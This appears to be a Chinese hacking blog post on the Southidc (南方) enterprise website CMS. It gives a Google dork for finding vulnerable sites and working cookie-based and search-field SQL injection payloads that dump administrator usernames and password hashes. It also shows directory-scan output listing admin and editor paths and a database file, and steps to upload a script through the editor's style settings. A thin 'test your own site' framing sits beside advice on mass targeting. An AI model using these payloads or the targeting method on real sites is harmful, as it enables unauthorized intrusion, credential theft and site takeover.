Jessica以前给我发过一套系统,说是有漏洞让我研究一下,结果就这样认识了这套系统,据JESSICA介绍才知道,这套系统的名字叫做南方企业网站管理系统,用的人还挺多的,好多企业的网站都是用这套系统来搭建的,包括青海本地好多公司的网站,可是这套系统有着很严重的漏洞,好多人对它视而不见,该漏洞可以引起网站被黑或是后台资料被删除等后果,今天闲着无聊,自己随手写了一个该网站程序的漏洞测试工具,使用很简单,只需要打开你的网站(前提是使用前面所述的网站管理系统),找一篇文章打开,然后把浏览器中的地址写到工具的提交表单中,点击提交就可以,如果你的后台的密码和用户名被成功的读取出来的话,那么就证明你的网站有漏洞,要修补了!!
以下是引用片段: http://www.qhwins.com/MyCode/hacker/CookiesHack.asp |
小提示,在GOOGLE中搜索“inurl:"/ProductShow.asp?ArticleID="”会出来N多网站,基本上都是上面的系统做的,几乎95%都可以拿到密码。
之二:
对于另一版本的程序(具体版本号不详),用上面的方法是取不到密码的,可是漏洞依然存在,用以下代码在浏览器中提交,然后刷新,即可看到密码。
第一步,浏览某一文章,如:
http://www.qhwins.com/shownews.asp?id=65
第二步,清空浏览器地址栏,输入以下代码,回车。
javascript:alert(document.cookie="id="+escape("65 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
第三部,在地址栏输入http://www.qhwins.com/shownews.asp 并刷新,即可看到密码。
一点小技巧,往往我们暴出来的密码,MD5的时候要麻收费,要麻查不出来,这时候我们可以试试网站有没有其它管理员存在,或许存在着弱口令呢,OK,改一下上面的注入语句,把当前默认管理员的ID暴出来
javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,id,9,10 from Admin"))
提交并刷新页面后页面返回
admin |
发布时间:10 |
d9ba59abbe56e0c7
注意看发布时间的后面10代表当前用户的ID,OK,有了这个ID,我们改变语句,再暴其它管理员的帐户,接着来 |
javascript:alert(document.cookie="id="+escape("91 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin where id>10"))
提交,然后重新刷新页面,OK,又暴出来了一个管理员帐户,并且是弱口令,拿到CMD5上面一查,密码123456,成功登录后台。
Found: /admin/southidceditor/popup.asp (HTTP/1.1 200 OK) !!!
Found: /admin/UpFile.asp?gl=file (HTTP/1.1 500 Internal Server Error) !!
Found: /admin/southidceditor/popup.asp (HTTP/1.1 200 OK) !!!
Found: /admin/SouthidcEditor/ewebeditor.asp (HTTP/1.1 200 OK) !!!
Found: /admin/picture.asp (HTTP/1.1 200 OK) !!!
Found: /admin/upfile.asp (HTTP/1.1 200 OK) !!!
Found: /inc/ (HTTP/1.1 403 Forbidden) !!!
Found: /admin/ewebeditor/ (HTTP/1.1 403 Forbidden) !!!
Found: /inc/conn.asp (HTTP/1.1 200 OK) !!!
Found: /UploadFiles/ (HTTP/1.1 403 Forbidden) !!!
Found: /xml/ (HTTP/1.1 403 Forbidden) !!!
Found: /scripts/ (HTTP/1.1 403 Forbidden) !!!
Found: /admin/admin.asp (HTTP/1.1 200 OK) !!!
Found: /admin/SiteConfig.asp (HTTP/1.1 200 OK) !!!
Found: /inc/conn.asp (HTTP/1.1 200 OK) !!!
Found: / (HTTP/1.1 200 OK) !!!
Found: /foot.asp (HTTP/1.1 200 OK) !!!
Found: /admin/conn.asp (HTTP/1.1 200 OK) !!!
Found: /admin/UpFile.asp?fp1=D: (HTTP/1.1 200 OK) !!!
Found: /admin/eWebEditor/admin_login.asp (HTTP/1.1 200 OK) !!!
Found: /admin/ewebeditor/ewebeditor.asp (HTTP/1.1 200 OK) !!!
Found: /admin/SouthidcEditor/Dialog/help/main.htm (HTTP/1.1 200 OK) !!!
Found: /admin/SouthidcEditor/Upload.asp (HTTP/1.1 200 OK) !!!
Found: /admin/login.asp (HTTP/1.1 200 OK) !!!
/Southidceditor/admin_style.asp?action=copy&id=14
/SouthidcEditor/Admin_Style.asp?action=styleset&id=47
/Southidceditor/ewebeditor.asp?id=57&style=southidc
/Southidceditor/Datas/SouthidcEditor.mdb
/Southidceditor/login.asp
以上内容原创,以下内容为转载
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
直接暴管理员帐号密码(md5)
2.登陆后台
3.利用编辑器上传:
访问admin/southidceditor/admin_style.asp
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
========================================
参考资料整理: